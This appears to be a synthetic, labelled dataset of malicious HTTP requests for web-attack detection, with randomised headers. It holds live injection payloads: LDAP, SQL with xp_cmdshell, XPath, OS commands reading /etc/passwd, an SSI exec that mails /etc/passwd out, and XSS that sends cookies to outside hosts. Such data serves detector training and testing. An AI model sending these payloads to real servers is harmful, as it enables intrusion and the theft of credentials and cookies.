Cookie: e9r1dwt=hJZfDO;1nr7=327277;QTian9otuslat=uemifldhn;oriQdNdiene6=)(  |  (  cn=*o'brien*)(mail =*o  'brien*)   ;bfgaua=ezS;y2n=16137
Cookie2: $Version="955"
Date: Wed, 30 Aug 06 12:46:03 UTC
ETag: "7H1DeaXiS2yyEZ-l"
Expect: 100-continue
If-Modified-Since: Tue, 28 Nov 06 24:47:10 GMT
If-Unmodified-Since: Fri, 01 Aug 08 14:49:57 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Jan 08 12:11:26 CET
Max-Forwards: 0
Pragma: no-cache
Authorization: te7s ttetaS=eeare
Referer: /rmnoshr.php3
TE: deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (Windows; U; WinNT 2.4; ui-tn; rv:3.9.6) Gecko/16259607
UA-CPU: MIPS
UA-Color: color32
Via: 2.0 www.eEler.jpeg, 4.7 www.rpdl2F.css
Transfer-Encoding: identity
Upgrade: sb5/5.9
Warning: 412 www.rdng.jpeg "rl9sz" "Tue, 12 May 09 01:48:31 GMT"
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 3517637301815
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

oehdcrihn=oof5n&zo=akIovte&nto4a=16de&slqyrhGdoNjz5u=eEo&iweBsh7soo0tdf=o0zt&eneths=0&Wo7inkasASm=sxW3ySILts&aeOa=5

End - Id: 39095
Start - Id: 37992
class: LdapInjection
GET /vwgKJMnLv7O-EFF/sxiYz2uay9Wy/ohsxmnleaso/mfamda28lanegirteud/aeoratvEiileiosoil/K4QGb/lAETzqpJcSXEmochas/nsa/rptP3oKnh.shtml?iysW=to+lo&emhlw3ehtotnEu=28%29%28%26%28objectClass%3Dpew%29%28%7C%28sn++++%3D++++aA%29%28cn%3Ddse++++J*%29%29&Qy1t5=pkYrgn&Dy=bujdeleter%3Dlocationko&euTh4a=j%27&edsRoiswyvfoop=h+e&oRiohS=uayHgmWnriE&g1tdo=esemiframe HTTP/1.1
Host: www.A1druteimA.net:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: feEi-Tseed, 1deeUos-ceah1aG
Cache-Control: max-stale=12849
Client-ip: 144.215.87.89
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Wed, 16 Dec 09 08:31:00 GMT
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: peRu9mr@dtroN.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Tue, 27 Jun 06 21:44:04 UTC
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: Sun, 07 Jun 09 02:16:55 CET
Max-Forwards: 80
MIME-Version: 4.1
Pragma: triEo=aaedOn
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: 4893-,-7197
Referer: http://www.rtSoI0.de/ujdnaff/gtHn.zip
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: Mozilla/5.7 (X11; U; Unix 7.3; ma-di; rv:9.6.8) Gecko/03683585
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/8.5 www.5tnags.html, ri6eh/6.2 32.182.122.128, 6.9 www.ieeT.jpeg:08
Transfer-Encoding: offjmi
Upgrade: 9aaia/6.6
Warning: 618 www.S7Ee.shtml "ejee2ebqDsA" 
X-Forwarded-For: 189.40.115.224
X-Serial-Number: 800649
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37992
Start - Id: 42098
class: SqlInjection
GET /VreplaceQG/x.VfyNpypg/.IyHahy/aemdit1ut.jsp?noehLEa=%27++%2F**%2F+++++OR++++%2F**%2F%27%27++++%3D++++%27 HTTP/1.1
Host: 196.66.228.173:648
Connection: 5tcnete
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: vhrk-mseieu;q=0.0, h-eoikbsu;q=0.2
Cache-Control: no-cache
Client-ip: 195.244.99.47
Cookie: 6h=3fJpB@0TZj;ic4j=u;1eIloews9h7eW=0567353;eR8to=sock_stream
Cookie2: $Version="787"
Date: Wed, 25 May 05 18:49:30 CET
ETag: "ducLTVBou0lyuo32LMT"
Expect: troiSdth=erstetro;ir9otau
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 09 Nov 06 21:49:12 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: "DzdzsRX5efM3eheoOl"
If-None-Match: "ou0YwSWz9LPv0Awbi"
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 37
MIME-Version: 0.9
Pragma: dlm6accr='oxnauah'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest opaque="rot0ett"
Range: -824,-58,-460
Referer: /cikrc1au/eeiwms/csTEgm.exe
TE: trailers,trailers
Trailer: User-Agent
User-Agent: usecOoinyMwftoserno
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: ewnitt; TetiX=2O0pulh
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42098
Start - Id: 35481
class: XPathInjection
GET /ey/aaretvuUnfkbaixt/lEaC6nJv4_/elellTrhtcHoiEFoAlsl/izyUz1@ChVYjw60F-2g@/k-7eTsicd/rpanap/ide/M66likeXu-/4-j8nlQb/u-pwr91bLiQgF/mKVXX1m1l6P.html?itsy5=05765354 HTTP/1.1
Host: www.nisaNkRtee.cz
Connection: ct8ms
Accept: text/plain, audio/*, audio/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Cookie: Q_TOpbetweenw1QTQ=suarntil16c8linp4k;aeestha6lez=haades
Cookie2: $Version="2"
Date: Thu, 11 Aug 05 05:45:06 GMT
ETag: "Gl6oIwNlvdG98J9"
Expect: otnsn=F0tl
From: laKsn@Rbbpaoe.de
If-Modified-Since: Thu, 09 Nov 06 22:46:41 UTC
If-Unmodified-Since: Mon, 11 Feb 08 01:33:39 UTC
If-Match: *
If-None-Match: "Uo7AJuE8D90Slf@wTq"
If-Range: Sun, 07 Dec 08 22:43:59 CET
Max-Forwards: 295
MIME-Version: 4.9
Pragma: abhqku3='5NtaeEl'
Proxy-Authorization: Digest qop=auth
Authorization: Digest opaque="enwri"
Range: 989336-,-2,-278466
Referer: /stIDhe7/aNtmNl.fgf
TE: trailers,trailers
Trailer: Warning
User-Agent: l3'    or    1< 1/5e/vA/child::text()[position()=921] or  'oiS7s'    ='
UA-CPU: StrongARM
UA-Disp: 0547,432,32
UA-Color: color16
UA-Pixels: 9064x1770
Via: HTTP/3.9 135.129.161.35, 2.8 82.96.41.143, 5.4 www.Esun.js
Transfer-Encoding: gzip
Upgrade: 0afh/7.8, vwin/6.7, BkRxh/3.8, trsf/0.4
X-Forwarded-For: 156.158.202.82
----: -------------

null

End - Id: 35481
Start - Id: 47747
class: XSS
GET /a6sxBSKGH2Sfdc/flibacceptfprRH/goHPwindow.openR_EUc/s1A7/oM.R478/tcEr/Z5Ydrr/RwneebpMetTaEiz/gCZr1oG5tO3R8CsP9mVK/qasihnPseaetEtnnA/ieetsa.asmx?pefcrO=63929&phnEaNoehioihh=e&vAOec5=9&cue=%3Cimg+src++%3D++%22++++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.annaonto.com%2Fcgi-bin%2Fie.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E HTTP/1.0
Host: 119.180.170.1
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.1, deflate, gzip;q=0.3, identity;q=0.3
Accept-Language: *;q=0.5
Cache-Control: y3niSsit=yDldso
Client-ip: 58.135.32.75
Cookie: eerbneUse=)asse7union2m
Cookie2: $Version="00"
Date: Thu, 08 Jan 09 19:41:46 CET
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Wed, 22 Feb 06 11:48:37 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: "ztaZzhDtm3BqBDYbIuK"
If-None-Match: "b-BHmqSfOT2aURH28y"
If-Range: "89r0YXzcL2t1Y-JhR"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: stt6=4aNi
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: 6lRTvt et6rdy=hgrgone
Range: -887125,6715-3229
Referer: http://www.fF8g.uk/celbnef/lgAtec/Eh4e/nzsEn.js
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 9.9; hs-pi; rv:2.6.8) Gecko/01072970
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: re7he/5.9 www.enoCin.jpg:3
Transfer-Encoding: identity
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47747
Start - Id: 47952
class: XSS
GET /omE.wpv1uMM/orExi.ymTj/fSrcpzrC/hdrontBRke/Rhyyfenhoofbeo/st0lhMtori/stn/uidMm2u2io/iionrooctinem/rjnlottntxs/eDennblvne3cstty/romilzua2tut1fe.tiff?shieraiOnMno=%298execailne&h9tcthotesio8xn=6841321&aiaera5lteaH2=f&tr=nt3hTlchryaroeAh1&aN6NG-=lneTtri&eaaejeoeo=+%29linkW&.nqpOv4=08&ttudeQn=%3Cbgsound+++src+++%3D++%22+++++javascript%3A+%5Balert+%28%27se%27%29%3B%5D+++++%22++++%3E&dem=llndo&eevrrWtt3=eufec6ao&4jopdoasrlnmia=%3Eh%400ir3+p%27citew HTTP/1.0
Host: www.pdrlgew.biz
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.6, iso-2022-kr;q=0.4, shift_jis, isiri-3342;q=0.4, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 120.235.185.123
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="803"
Date: Sun, 15 Mar 09 11:58:04 CET
ETag: "KcewOORnrl2FF.IfWMZO"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Fri, 29 Oct 04 06:40:45 GMT
If-Match: *
If-None-Match: "@NdAmCTz_vgN8-ok.C"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Digest nc=D3344DE4
Range: -162,92-
Referer: /Dront/o9ob.png
TE: chunked;q=0.6,deflate;q=0.3,deflate
Trailer: Date
User-Agent: DkreW4rl
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: HTTP/8.3 www.x4et2tt.shtml
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47952
Start - Id: 35498
class: XPathInjection
GET /includerqVjDP48Y/locationzUFB@netcat/sstnyetcs/en7tn9a/tcxNpbN_N./w3yaCAHBb87y.php?hhifVstpbo=07297&rn1qtns=NaNmdzf8en&tmpiocI8p0tnot=648092589&leiperie2kab=658423&6nNn7karren=sh4i&aeQte4scc=numNrrs&aaLo0sLWbgsoundK-=61&hometmpAV-tmpstdindsCIJ=4776424&T9Upb=ntihttl&rmm1iy=2348700&amithar=tncte&heesww7lrahibno=17623&aq9aeecor9otTi=lLjqu3Iy2bf&hBulq=umolibjicat8twbteiTas&tsctonlc=eHstiahb0cGi HTTP/1.0
Host: 96.19.214.204
Connection: keep-alive
Accept: image/gif, video/*, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.1, identity;q=0.5, gzip;q=0.9, identity;q=0.0, identity;q=0.7
Accept-Language: o-deegi;q=0.3, g-lb;q=0.2, 7io-tdndh, k-iaim0;q=0.4, 0caiotT-EdtCbs;q=0.1
Cache-Control: no-transform
Client-ip: 209.250.192.160
Cookie: AS=5591 or  count(path/child::node()[position()=((i+j+k+l+1)] | path/child::*()[position()=(k+1)])=1  or   221=
Cookie2: $Version="53"
Date: Mon, 10 Nov 08 06:07:54 UTC
ETag: W/"g-dkCFxHf5ZOsKZBpGD"
Expect: n3serr=yceoeeS;qmTsss=deunoaTt
From: a8rg@iaaSadh.uk
If-Modified-Since: Tue, 03 Apr 07 11:40:06 UTC
If-Unmodified-Since: Fri, 07 Dec 07 04:46:18 CET
If-Match: "rQad.Gq7ugRmTibkt"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: NTLM aGlvZmVhb3dsaHJlMmFpc3JBcEdSbmFPZW5pZVJuamNlaDB3SHNsZnM1YmU=
Range: 2-37781,-037,39-
Referer: http://AiNe2.be/qnih.nsf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 6.5; mh-sw; rv:9.0.1) Gecko/55681411
UA-CPU: Sparc
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x662
Via: 1.9 176.137.236.36:3406, 4.5 www.Sctk.png:823
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: l7Aui/5.3, eeBCtt/3.9, 3iy/7.7
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35498
Start - Id: 36810
class: OsCommanding
GET /608_N@s/0DoJxx3zbSE4k.jpg?4l=%7C+++++cat+++++%2Fetc%2Fpasswd&9bh1evals9Jml=rsi%40&a8soejnue=m%5Ctetiopenge&iehhtoann=hhz%5D&se=oce+%3CSvK&ssE2=+ovees5%7Ctxml&torwsm3c=e5EoutRaccess_logaehamthtw&9ri=foYscripty&segqygod8oFeht=363&molinns0on7gli=s.dPX-z&rel=lhuv3neln&sjiG.DZck=bnnrrngrg&cqqeyehAaeyl=pPS_ICwc HTTP/1.0
Host: 130.161.161.239:141
Connection: tn4tais
Accept: text/*, image/*, audio/x-wav;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: oyDcSs-stu
Cache-Control: no-transform
Cookie: ttifchmi=5633568;AnisW-9pHw=ogA TCofcw;adea4asndpEzgc=55
Cookie2: $Version="1"
Date: Wed, 10 Mar 04 18:47:57 CET
ETag: W/"f.AsugJAgysLA_ZZECY"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Tue, 29 Jun 04 08:05:41 CET
If-Unmodified-Since: Tue, 15 Nov 05 17:52:24 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 54
Pragma: eSasiht8=tvnuO
Authorization: Basic SGluaDpzaWN0bw==
Range: 853-078834,3-3
Referer: /etNVs/nhsiAa/Ofxh/4oie/orxeslu.tiff
TE: gzip;q=0.8,trailers
User-Agent: ApsmbBgesw
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 8261x3395
Via: 4.4 www.eoatezc.gif:16570
Transfer-Encoding: identity
Warning: 616 205.175.245.132 "aielbrhgxemaihh" 
----: -----------

null

End - Id: 36810
Start - Id: 47640
class: XSS
GET /cC.html?uldurc6hLasxu=713160&zhsOtclo=%26%7B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.nselst.com%2Fcgi-bin%2Fll.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&in1bfX=8905656&93sXOwp-=%3D7processing-instructionir%5DFwvbscriptweevalsY-o&dqtodl=6&ntA%ul=438626&yQkqfVE=d1itlet&alnhedhre6j=d5%3F&sadei=5828&xpoctto5ay=eallg&aTEat=6 HTTP/1.1
Host: www.sarytw.gov
Connection: keep-alive
Accept: text/*, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Gghi-in, udmN-hrlEse9;q=0.6, d75br-oiDc;q=0.4
Cache-Control: max-stale
Client-ip: 61.243.9.51
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="84"
Date: Fri, 18 Dec 09 04:29:22 UTC
ETag: W/"BIYFtHjXJp75ty5P"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 25 Sep 09 06:40:03 UTC
If-Unmodified-Since: Mon, 26 Jun 06 22:18:29 UTC
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 4403
MIME-Version: 9.3
Pragma: w2gaaB4=eJsnti
Proxy-Authorization: Digest opaque="enht"
Authorization: NTLM NTBncmEzemlodG5pdGVsYWVyZWxvb3VvSWxNTW9td3JldXVzbWxlY1NhZ2Fh
Range: 51-,059585-
Referer: http://www.bgeeop.gov/a9RON4ha/dlvtlao/euoiJts.css
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: tksaer1zl/8.9.1.0
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: 7.7 236.200.183.97
Transfer-Encoding: deflate
Upgrade: 5dscf/6.1, eosne/4.5
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47640
Start - Id: 43021
class: OsCommanding
PUT /a@qKcoTJeK1aj8h3uIS2/ceereoothwM5p/9Z9rbmGfE/.W/i4cMpuCr8GJtWCkt5/tIHiac/mSPsV.j-@qu/eqdefbm4PWJGb/p1l.html? HTTP/1.1
Content-Length: 166
Content-Language: bcAf,i
Content-Encoding: deflate
Content-Location: http://www.t7ncm.net/afeeluO8/4xpldasp/4tetel/lMntl.wav
Content-MD5: OGlwanByRGFoZXZhbzd1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 06:40:20 GMT
Last-Modified: Thu, 30 Mar 06 20:04:01 UTC
Host: www.bt4tWe.org:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: koi8-r;q=0.5, x-mac-greek, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: eneww-twmauivt;q=0.2, 6vnsn3bm-iyeheLu;q=0.5, d-ea
Cache-Control: only-if-cached
Client-ip: 46.198.129.51
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="6"
Date: Tue, 19 Jul 05 16:46:10 CET
ETag: "MCaPKcldcM8leI_Vy"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Sun, 12 Mar 06 08:33:59 CET
If-Unmodified-Since: Mon, 24 Apr 06 19:14:14 CET
If-Match: *
If-None-Match: *
If-Range: "@rHsAMtbmFwaNIZzzri"
Max-Forwards: 8792
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Basic cmlnNzpxaHN1
Range: 171-10,013-0,-6
Referer: http://tehlA.gov/rSoSuha/ydtrtu/daspcdn.js
TE: gzip;q=0.5,deflate
Trailer: Pragma
User-Agent: tKWfz8V@N http://www.hnoniss.fr
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: gzip
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

ea=thlR&H3tCaIr=9702&hdntO=/perl /tmp/aletenro.pl     -p7722&ej4Eknyiwg=46wiuhlaN&J792ftpnph-DkE=child home:&EzDzR1Nllt=5&8BXWqV@=bea<lOvw&G4.-3eDTyDD7=6300

End - Id: 43021
Start - Id: 46694
class: XSS
GET /dDrejumilah/W63DbiPJK-u4.tiff? HTTP/1.0
Host: www.oiesoeeny.uk
Connection: keep-alive
Accept: video/*;q=0.1, application/*;q=0.0, application/zip;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=9
Client-ip: 15.66.27.83
Cookie: ZyVjYW=<img    src = "    raetanta  > "     onmouseover    ="   [alert    ('9I');]     "  >;nad=omUpqhA
Cookie2: $Version="128"
Date: Wed, 01 Aug 07 08:05:41 GMT
ETag: "-ryAjD.ESzLF3wn2-P"
Expect: 100-continue
From: gUe0dt@wcxl0eh.cz
If-Modified-Since: Tue, 27 Jun 06 18:14:14 GMT
If-Unmodified-Since: Fri, 20 Apr 07 08:04:58 GMT
If-Match: "IqPwNH8iwQDO1DZ3U2K"
If-None-Match: *
If-Range: Tue, 12 Jan 10 18:38:18 GMT
Max-Forwards: 6
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: 6eo7l rrpb=5fahe
Authorization: tketmo hjtnqr9=3grnct
Range: -441983,369-,-36125
Referer: /ihja/ilcesthb/pkd0h/anM6x/em8oerl.nsf
TE: chunked;q=0.9,trailers
User-Agent: Mozilla/4.4 (Machintosh; U; Mac OS X 9.4; gX-z5; rv:4.3.1) Gecko/54266219
UA-Color: color32
UA-Pixels: 846x3325
Via: aEvttr/1.9 www.Luire.js:54794
Transfer-Encoding: identity
Warning: 551 www.rrtles.tiff "mtemnedikCwpaoSe" 
X-Forwarded-For: 7.125.26.87
X-Serial-Number: 58259350199182580
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46694
Start - Id: 41170
class: SqlInjection
PUT /htaccesbimgo9As4wBCaA/P2k9q2o0lKT/7amyzgslsit/nto/aegTeyeuz4ohOR/eEmoxeeii5.html? HTTP/1.0
Content-Length: 32
Content-Language: sseTCx,n
Content-Encoding: deflate
Content-Location: http://nouE3oi.ch/betg.wmn
Content-MD5: ZXNzbzJwZWNpdHBlaGFnZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 22:15:56 GMT
Last-Modified: Tue, 29 May 07 24:32:07 UTC
Host: www.ogeavsr.uk
Connection: nEesgth
Accept: video/*, image/png;q=0.4, image/*
Accept-Charset: euc-jp, iso-8859-7;q=0.1, x-mac-japanese;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Cookie: mailUidV=1085;us1hxcHes5=53;en=YnviCmilarof;re4Fr7oeo=';EXEC    master.dbo.xp_cmdshell    'cmd.exe;4ivdaeztnierbLb=moH;7p8eotk=rQ|input<
Date: Mon, 19 Oct 09 12:05:26 UTC
If-Unmodified-Since: Mon, 09 Feb 09 06:32:53 GMT
If-Range: Sat, 02 Apr 05 08:13:37 GMT
Max-Forwards: 70
Referer: http://www.oaren.biz/aesIHO/uwId/i7oqk/ntnFitoe/tuhl.fgf
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 8.7; ot-c1; rv:1.5.2) Gecko/37149399
Via: HTTP/9.9 www.yteep.js:51
----: ---------------------
~~~~~: ~~~~~~~~~~~~

fefa=nmC2DhA.kO@&q-likeJ=07036

End - Id: 41170
Start - Id: 39967
class: SSI
GET /xp_WeA889/MnshnotOdqeioreqoid/a2e/6Zs/s_bygX7HvPFRD89mcLR1/mtmnotil9wooisEdeeO.asp?eh=rbEUuOK6&datijtaoehgwms=lC9qFc&fn3nfotisl=21326&naYe0ordr=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fmail++++nientiEd.com++%3C++++%2Fetc%2Fpasswd%22--%3E&0tdevwoslhcuY=gum8_&oasq=xeFsetraceeitt3&hoo=inputobeval9&Ordrp=0aNsst+%29nhae0e HTTP/1.0
Host: 49.11.149.234:80
Connection: wzoeCn
Accept: */*;q=0.9
Accept-Charset: big5, windows-1255, iso-8859-8, ks_c_5601-1987
Accept-Encoding: gzip, gzip;q=0.1, compress;q=0.9, gzip;q=0.4
Accept-Language: ng6t-lNvaskjo;q=0.9, niansw-cgmjenn;q=0.6, mibxe-hno;q=0.1, uxz-ico, i9al-Hs
Cache-Control: only-if-cached
Client-ip: 183.52.12.49
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Sat, 20 Mar 10 18:44:15 GMT
ETag: W/"AZnigfVHFs0zM56rr"
Expect: sd2t
From: qaol9@aa3eqiae.fr
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 657
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://nylwRo.be/tse9iOem/Drt67f/aars8ae9.sh
TE: trailers,chunked,chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/1.8 (compatible; dieauerank; Windows NT; wlmi; s3tZnt; lzeem0)
UA-CPU: Sparc
UA-Color: color16
Via: FTP/1.9 www.djIlhie.html
Transfer-Encoding: identity
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39967
Start - Id: 48955
class: XPathInjection
GET /1heahsohntj.php4?0oeXaMmqfVOq=i&iatyeRob=hbaisse1&nd_AQPV9OR=etrue+seztu&mmepansotvRda=o3rh%27+++or++++%28i+++++%3C++++count%28sahmrs%2Fchild%3A%3Atext%28%29%29++and+j+++++%3C++count%28lte0c%2Fchild%3A%3Acomment%28%29%29++++and+k++%3C+count%28st%2Fchild%3A%3A*%29+++%29+++or+++++%27om84sc0%27+++%3D+%27+++++egr%27+++or&tttc62seg=ree1ndci3Et3c&uceeptlnnahue=05143343&bstep=31&e1=984534&debaLxeiealehk=n%29Oinclude&eadntsjxyteSh=le%27 HTTP/1.0
Host: www.lsni.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: agwder-1iinb7sa;q=0.3
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: wtEPyy=6413396;hQxUS9eOxg=iw9
Cookie2: $Version="71"
Date: Sun, 30 Nov 08 09:48:03 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Fri, 27 Apr 07 16:30:38 GMT
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Apr 05 08:44:32 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: http://www.iaxrU.biz/ennjn/Jnt3O.sh
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.7 (X11; U; Unix 4.4; aU-le; rv:1.4.2) Gecko/34003825
UA-CPU: Sparc
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: HTTP/3.9 www.m81gt.png, aced/6.8 www.9etfm.css, HTTP/3.5 193.6.8.71
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48955
Start - Id: 46926
class: XSS
POST /4IOFd1oGK/leDCs5z/hxkFp7j8-0K3NvIqJoI/L6ateenesw/aifMhrfroaut/2Ld7CTV9Pboot.inidSD/eI4Apc/FNtuCJVrCWD/uelthhgx.htm? HTTP/1.1
Content-Length: 240
